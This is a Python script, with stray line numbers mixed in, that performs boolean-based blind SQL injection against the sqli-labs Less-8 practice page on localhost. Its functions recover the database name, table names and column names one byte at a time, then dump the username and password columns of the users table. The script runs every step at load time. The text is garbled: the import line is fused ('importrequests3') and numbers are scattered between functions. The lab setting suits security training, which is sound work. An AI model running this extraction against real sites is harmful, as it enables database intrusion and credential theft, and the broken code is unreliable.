1 #coding:utf-8
2 importrequests3
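def database_len(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, max_len=64):
    """Recover the length of the current database name via the boolean oracle.

    Sends ``?id=1' and length(database())>N%23`` for N = 0, 1, 2, ... and
    treats the marker ``'You are in'`` in the response body as TRUE.  The
    first N for which the oracle answers FALSE is the length.  Probing starts
    at 0 so a NULL ``database()`` (no schema selected) is reported as 0
    instead of being mistaken for length 1.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string and ``%23`` (``#``) comments out the rest of the query.
        fetch: Callable taking a URL and returning an object with a ``.text``
            attribute.  Defaults to ``requests.get``; inject a fake for tests
            or a ``requests.Session().get`` to carry cookies/proxies/timeouts.
        max_len: Upper bound on probed lengths.  MySQL identifiers are at most
            64 characters, so the default covers any real schema name (the
            original hard-coded 1..9 loop ended silently for names of 10+).

    Returns:
        The length as an int, or None when every probe up to ``max_len``
        answered TRUE (name longer than ``max_len``, or the oracle is broken,
        e.g. the marker also appears on the FALSE branch).
    """
    if fetch is None:
        fetch = requests.get  # resolved lazily so an injected fetcher never touches the network
    for n in range(0, max_len + 1):
        payload = "?id=1' and length(database())>%d" % n
        r = fetch(url + payload + '%23')
        if 'You are in' not in r.text:
            print('database_length:', n)
            return n
    # Every probe said "longer than N"; report it instead of ending silently.
    print('database_length: >%d (raise max_len)' % max_len)
    return None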
18
19
database_len()  # Module-level call: each extraction step runs at import/script start, in file order.
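def database_name(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, max_len=64):
    """Extract the current database name one byte at a time via the boolean oracle.

    For each position the probe is ``ascii(substr(database(),POS,1))=CODE``
    over every printable ASCII code (32..126).  Comparing numeric codes makes
    the result case-exact: the original ``substr(...)='c'`` form is
    collation-dependent and under the case-insensitive collations MySQL uses
    by default would report ``security`` as ``SECURITY`` because upper-case
    letters were tried first; it also silently skipped any character outside
    its hard-coded alphabet (e.g. ``_``).  Extraction stops at the first
    position where no code matches: ``ascii('')`` is 0 past the end of the
    string, and a leading byte >= 128 (multi-byte UTF-8) is not probed either.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string, terminated by ``%23`` (``#``).
        fetch: Callable taking a URL and returning an object with ``.text``.
            Defaults to ``requests.get`` (resolved lazily); inject a fake or a
            session-bound getter.
        max_len: Maximum number of positions probed.  MySQL schema names are
            at most 64 characters (the original stopped at 8).

    Returns:
        The recovered name; empty if the first position never matched.
    """
    if fetch is None:
        fetch = requests.get
    name = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = "?id=1' and ascii(substr(database(),%d,1))=%d" % (pos, code)
            r = fetch(url + payload + '%23')
            if 'You are in' in r.text:
                name += chr(code)
                print(name)  # progress feedback: blind extraction is slow
                break
        else:
            # No printable byte matched this position: end of string (or non-ASCII).
            break
    print('database_name:', name)
    return name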
39
database_name()  # Module-level call: runs at import/script start, after the length probe above.
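def tables_name(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, max_len=1024):
    """Extract the comma-separated table names of the current schema via the boolean oracle.

    The probed expression is
    ``(select group_concat(table_name) from information_schema.tables
    where table_schema=database())``, read one byte per position with
    ``ascii(substr(...,POS,1))=CODE`` over printable ASCII (32..126).
    Numeric comparison is case-exact and covers digits, ``_`` and other
    characters the original lower-case-only alphabet silently skipped
    (a skipped character shifted every later byte and corrupted the list).
    Extraction stops at the first position with no match (``ascii('')`` is
    0 past the end of the string).

    Caveat: ``group_concat`` output is capped by the server's
    ``group_concat_max_len`` (1024 bytes by default on MySQL), so a schema
    with many tables yields a truncated list; ``max_len`` defaults to that
    cap.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string, terminated by ``%23`` (``#``).
        fetch: Callable taking a URL and returning an object with ``.text``.
            Defaults to ``requests.get`` (resolved lazily).
        max_len: Maximum number of positions probed.

    Returns:
        The recovered comma-separated list (empty if nothing matched).
    """
    if fetch is None:
        fetch = requests.get
    names = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = ("?id=1' and ascii(substr((select group_concat(table_name) "
                       "from information_schema.tables where table_schema=database()),%d,1))=%d"
                       % (pos, code))
            r = fetch(url + payload + '%23')
            if 'You are in' in r.text:
                names += chr(code)
                print(names)  # progress feedback: blind extraction is slow
                break
        else:
            # No printable byte matched this position: end of string (or non-ASCII).
            break
    print('table_name:', names)
    return names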
58
tables_name()  # Module-level call: runs at import/script start, after the schema-name extraction above.
61
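def columns_name(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, table='users', max_len=1024):
    """Extract the comma-separated column names of ``table`` via the boolean oracle.

    The probed expression is
    ``(select group_concat(column_name) from information_schema.columns
    where table_schema=database() and table_name='TABLE')``, read one byte
    per position with ``ascii(substr(...,POS,1))=CODE`` over printable ASCII
    (32..126).  Numeric comparison is case-exact and covers digits and ``_``,
    which the original lower-case-only alphabet silently skipped (corrupting
    every later byte).  Extraction stops at the first position with no match.

    Caveats: ``group_concat`` output is capped by ``group_concat_max_len``
    (1024 bytes by default on MySQL), hence the default ``max_len``.  The
    ``table`` value is interpolated verbatim inside single quotes in the
    injected SQL: pass a bare identifier only -- a value containing ``'``
    breaks the injected query.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string, terminated by ``%23`` (``#``).
        fetch: Callable taking a URL and returning an object with ``.text``.
            Defaults to ``requests.get`` (resolved lazily).
        table: Table whose columns are listed (the original hard-coded
            ``users``).
        max_len: Maximum number of positions probed.

    Returns:
        The recovered comma-separated column list (empty if nothing matched).
    """
    if fetch is None:
        fetch = requests.get
    names = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = ("?id=1' and ascii(substr((select group_concat(column_name) "
                       "from information_schema.columns where table_schema=database() "
                       "and table_name='%s'),%d,1))=%d" % (table, pos, code))
            r = fetch(url + payload + '%23')
            if 'You are in' in r.text:
                names += chr(code)
                print(names)  # progress feedback: blind extraction is slow
                break
        else:
            # No printable byte matched this position: end of string (or non-ASCII).
            break
    print('column_name:', names)
    return names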
78
columns_name()  # Module-level call: runs at import/script start; targets the hard-coded 'users' table.
81
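def username_value(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, table='users', column='username', max_len=1024):
    """Extract the comma-separated values of ``column`` in ``table`` via the boolean oracle.

    The probed expression is ``(select group_concat(COLUMN) from TABLE)``,
    read one byte per position with ``ascii(substr(...,POS,1))=CODE`` over
    printable ASCII (32..126).  Numeric comparison is case-exact and covers
    every printable character; the original tried a lower-case alphabet
    with ``substr(...)='c'``, which lost case under MySQL's default
    case-insensitive collations and silently skipped characters outside
    the alphabet (``@``, ``!``, upper-case ...), shifting every later byte.
    Extraction stops at the first position with no match.

    Caveats: ``group_concat`` output is capped by ``group_concat_max_len``
    (1024 bytes by default on MySQL), hence the default ``max_len``; rows
    beyond the cap are silently cut off.  ``table`` and ``column`` are
    interpolated verbatim as identifiers into the injected SQL -- pass bare
    identifiers only.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string, terminated by ``%23`` (``#``).
        fetch: Callable taking a URL and returning an object with ``.text``.
            Defaults to ``requests.get`` (resolved lazily).
        table: Source table (the original hard-coded ``users``).
        column: Source column (the original hard-coded ``username``).
        max_len: Maximum number of positions probed.

    Returns:
        The recovered comma-separated value list (empty if nothing matched).
    """
    if fetch is None:
        fetch = requests.get
    values = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = ("?id=1' and ascii(substr((select group_concat(%s) from %s),%d,1))=%d"
                       % (column, table, pos, code))
            r = fetch(url + payload + '%23')
            if 'You are in' in r.text:
                values += chr(code)
                print(values)  # progress feedback: blind extraction is slow
                break
        else:
            # No printable byte matched this position: end of string (or non-ASCII).
            break
    print('username_value:', values)
    return values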
98
username_value()  # Module-level call: runs at import/script start; dumps the 'username' column of 'users'.
101
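def password_value(url='http://127.0.0.1/sqli-labs/Less-8/index.php', fetch=None, table='users', column='password', max_len=1024):
    """Extract the comma-separated values of ``column`` in ``table`` via the boolean oracle.

    The probed expression is ``(select group_concat(COLUMN) from TABLE)``,
    read one byte per position with ``ascii(substr(...,POS,1))=CODE`` over
    printable ASCII (32..126).  Numeric comparison is case-exact and covers
    every printable character; the original tried a lower-case alphabet
    with ``substr(...)='c'``, which lost case under MySQL's default
    case-insensitive collations and silently skipped characters outside
    the alphabet (``@``, ``!``, upper-case ...), shifting every later byte --
    a fatal flaw for passwords in particular.  Extraction stops at the first
    position with no match.

    Caveats: ``group_concat`` output is capped by ``group_concat_max_len``
    (1024 bytes by default on MySQL), hence the default ``max_len``; rows
    beyond the cap are silently cut off.  ``table`` and ``column`` are
    interpolated verbatim as identifiers into the injected SQL -- pass bare
    identifiers only.

    Args:
        url: Base URL of the injectable page; the payload is appended as the
            query string, terminated by ``%23`` (``#``).
        fetch: Callable taking a URL and returning an object with ``.text``.
            Defaults to ``requests.get`` (resolved lazily).
        table: Source table (the original hard-coded ``users``).
        column: Source column (the original hard-coded ``password``).
        max_len: Maximum number of positions probed.

    Returns:
        The recovered comma-separated value list (empty if nothing matched).
    """
    if fetch is None:
        fetch = requests.get
    values = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = ("?id=1' and ascii(substr((select group_concat(%s) from %s),%d,1))=%d"
                       % (column, table, pos, code))
            r = fetch(url + payload + '%23')
            if 'You are in' in r.text:
                values += chr(code)
                print(values)  # progress feedback: blind extraction is slow
                break
        else:
            # No printable byte matched this position: end of string (or non-ASCII).
            break
    print('password_value:', values)
    return values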
118
password_value()  # Module-level call: runs at import/script start; dumps the 'password' column of 'users'.